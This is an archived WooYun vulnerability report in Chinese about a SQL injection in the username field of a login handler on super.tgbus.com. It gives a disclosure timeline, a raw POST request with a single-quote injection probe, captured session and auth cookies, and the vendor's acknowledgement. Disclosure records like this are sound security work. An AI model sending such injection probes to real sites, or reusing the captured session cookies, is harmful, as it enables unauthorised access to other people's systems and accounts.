乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-18: 细节已通知厂商并且等待厂商处理中 2015-09-21: 厂商已经确认,细节仅向厂商公开 2015-10-01: 细节向核心白帽子及相关领域专家公开 2015-10-11: 细节向普通白帽子公开 2015-10-21: 细节向实习白帽子公开 2015-11-05: 细节向公众公开
就是注入了
username参数注入
POST /User/Action.ashx?type=login HTTP/1.1Host: super.tgbus.comContent-Length: 60Origin: http://super.tgbus.comX-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept: */*DNT: 1Referer: http://super.tgbus.com/login.shtmlAccept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: Bsgu_3720_saltkey=9mr1488l; Bsgu_3720_lastvisit=1442499504; ASP.NET_SessionId=ljywmv45rokfwr2l45hzsjee; Bsgu_3720_auth=a1f0JlYYP%2BW9lRAaOMihghHlOiDyy4IBM9dXIwjt1jKdtZLhXw7y9jh5Nqc8KlfjNA1xGg97tSm%2F1f%2Fr1oOsTg6hyEPruw; Tgbus_Passport=A0587A65646117DE68ACE88632E90CA3567CF06AF5E0A819; Bsgu_3720_creditnotice=0D0D2D0D0D0D0D0D0D37873878; Bsgu_3720_creditbase=0D0D2D0D0D0D0D0D0; Bsgu_3720_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; Bsgu_3720_yfe_in=1; Bsgu_3720_cookiereport=60caQbeHd3OyUmkHj4eH6nJkGRc9BJjt0e8pEuPnr1AOJfFtSkDu; Bsgu_3720_ulastactivity=c11aePOoD5NhjXkS0G4kzr6qTRd1YL8mJ%2BxWokPiUHTmOMnDqRYd; Hm_lvt_765e4a95eb8653564a947c539998a20a=1442503938,1442503980,1442504372,1442504484; Hm_lpvt_765e4a95eb8653564a947c539998a20a=1442509479; Bsgu_3720_lastact=1442509484%09forum.php%09; Bsgu_3720_sid=3zm2hAdialogMsg=&userName=admin'&password=asdasdasd&validateCode=4
程序猿
危害等级:高
漏洞Rank:20
确认时间:2015-09-21 09:41
感谢洞主对完美世界的关注,我们将尽快修补。
暂无